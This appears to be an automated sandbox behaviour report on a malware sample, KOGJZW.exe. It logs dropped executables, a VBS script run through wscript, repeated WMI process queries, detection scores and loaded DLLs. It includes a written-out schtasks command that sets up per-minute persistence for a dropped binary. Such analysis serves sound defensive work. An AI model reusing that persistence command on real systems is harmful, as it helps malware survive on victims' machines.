Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'
Source: C:\Windows\SysWOW64\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_KOGJZW.exe'

Source: C:\Users\user\Desktop\KOGJZW.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\KOGJZW.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: KOGJZW.exe	Virustotal: Detection: 88%
Source: KOGJZW.exe	ReversingLabs: Detection: 92%

Source: C:\Users\user\Desktop\KOGJZW.exe

File read: C:\Users\user\Desktop\KOGJZW.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\KOGJZW.exe "C:\Users\user\Desktop\KOGJZW.exe"
Source: C:\Users\user\Desktop\KOGJZW.exe	Process created: C:\Users\user\Desktop\._cache_KOGJZW.exe "C:\Users\user\Desktop\._cache_KOGJZW.exe"
Source: C:\Users\user\Desktop\KOGJZW.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe "C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe"
Source: unknown	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe "C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe"
Source: C:\ProgramData\Synaptics\Synaptics.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7936 -s 7400
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe "C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Users\user\Desktop\KOGJZW.exe	Process created: C:\Users\user\Desktop\._cache_KOGJZW.exe "C:\Users\user\Desktop\._cache_KOGJZW.exe"	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\WSFDII.vbs	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1

Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Section loaded: rasadhlp.dll	Jump to behavior
